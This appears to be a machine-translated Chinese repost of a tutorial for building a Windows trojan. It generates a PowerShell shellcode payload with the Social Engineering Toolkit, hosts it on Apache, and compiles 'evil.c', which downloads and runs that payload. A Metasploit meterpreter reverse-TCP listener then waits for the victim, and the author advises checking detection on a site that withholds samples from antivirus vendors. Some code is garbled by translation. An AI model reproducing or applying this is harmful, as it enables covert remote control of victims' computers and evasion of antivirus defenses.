前言:
现在我们对“apache 根目录”都比较关注,各位老铁们都想要分析一些“apache 根目录”的相关内容。那么小编在网摘上汇集了一些有关“apache 根目录””的相关文章,希望你们能喜欢,你们快快来了解一下吧!测试你自己的病毒
你需要的东西:
Kali Linux一个'C'编译器(我在Windows上使用gcc,我似乎无法使kali版本正常工作)社会工程工具包(预装在kali上)Apache Webserver (预装在kali上)Metasploit框架(也预装在kali上)
创建Powershell有效负载
我们将使用Social Engineering Toolkit来创建powershell有效负载。要打开它,请在控制台中键入:
setoolkit
从那里,输入1表示“社会工程攻击”,然后输入9表示“powershell攻击向量”,最后输入1表示“powershell字母数字shellcode注入器”。
现在,你需要提供一个“LHOST”。如果您还不知道,这是您的攻击者计算机的本地IP地址(只要您攻击局域网)。要确定它,请打开一个新的终端窗口并输入:
使用ifconfig
向上滚动以查找连接到网络的界面(在我的情况下,即“eth0”)。找到我突出显示的内容,“inet”,然后在它旁边找到你的本地IP地址(在我的例子中,它是10.0.0.13)。这是您为LHOST输入的内容。
接下来,它会提示您输入“反向端口”。它指的是“LPORT”。通常,我使用“4444”作为仪表预设,但只要你记得它就可以使用你想要的任何端口。
然后它会提示您是否要“立即启动监听器”。输入“否”,我们稍后会手动执行此操作。现在我们已经完成了SET。
现在我们需要将有效负载移动到我们的apache webserver。为此,请打开终端并键入:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
但是,如果您仍在使用Kali Linux 1(而不是2),请使用以下命令:
mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt
这是因为,在Kali Linux版本2中,apache根目录被移动到/ var / www /中的“html”文件夹。
现在,只需输入:
service apache2 start
...并且应该启动您的网络服务器。
第2步
创建病毒
要创建病毒,我使用的是Windows记事本和MinGW的“gcc”。该病毒的代码如下:
#include <stdio.h>
main()
{
system(“powershell.exe \”IEX((new-object net.webclient).downloadstring(''))\“” );
返回0;
}
请记住更改“10.0.0.13”,因为您的LHOST(或本地IP地址)可能会有所不同。
将其保存为“evil.c”,然后使用您喜欢的c编译器进行编译。就我而言,我正在使用gcc,所以我输入:
gcc.exe D:\ Hacking \ evil.c -o D:\ Hacking \ evil.exe
现在我们有了FUD(“完全不可检测”)的可执行文件。
步骤3
设置监听器
最后,我们需要设置一个监听器来等待一个meterpreter会话。键入以下命令启动metasploit框架:
msfconsole
加载后,键入:
使用multi / handler
现在,您需要输入一系列选项,以便我们为您列出:
设置PAYLOAD windows / meterpreter / reverse_tcp设置LHOST 10.0.0.13设置LPORT 4444
再次,记得要LHOST改变你的本地IP地址,并更改LPORT如果你使用其他的东西比4444。
最后,输入“exploit”并按Enter键启动监听器。一旦您的受害者运行“evil.exe”病毒,您将获得一个会话。
而已!
如果您想针对防病毒检查您的可执行文件,我建议您不要使用VirusTotal。这是因为他们将签名提交给防病毒公司 - 增加了检测可执行文件的可能性。相反,我个人使用nodistribute.com,因为如果他们遵守诺言,签名就不会被提交。如果您有兴趣,以下是我的可执行文件的结果:
标签: #apache 根目录